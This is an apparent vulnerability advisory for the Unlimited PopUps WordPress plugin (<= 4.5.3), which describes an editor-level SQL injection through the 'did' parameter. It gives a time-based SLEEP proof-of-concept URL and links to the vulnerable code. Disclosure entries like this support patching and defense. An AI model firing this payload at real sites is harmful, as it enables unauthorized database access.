WordPress Plugin Vulnerabilities
Unlimited PopUps <= 4.5.3 - Author+ SQL Injection
Description
The plugin does not sanitise or escape the did GET parameter before using it in a SQL statement, available to users as low as editor, leading to an authenticated SQL Injection
Proof of Concept
https://plugins.trac.wordpress.org/browser/unlimited-popups/trunk/popuplist.php#L16 https://example.com/wp-admin/admin.php?page=popup&info=del&did=1%20AND%20(SELECT%204420%20FROM%20(SELECT(SLEEP(5)))yVXX)
Affects Plugins
References
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Shreya Pohekar of Codevigilant Project
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-10-07 (about 2 years ago)
Added
2021-10-07 (about 2 years ago)
Last Updated
2022-04-09 (about 2 years ago)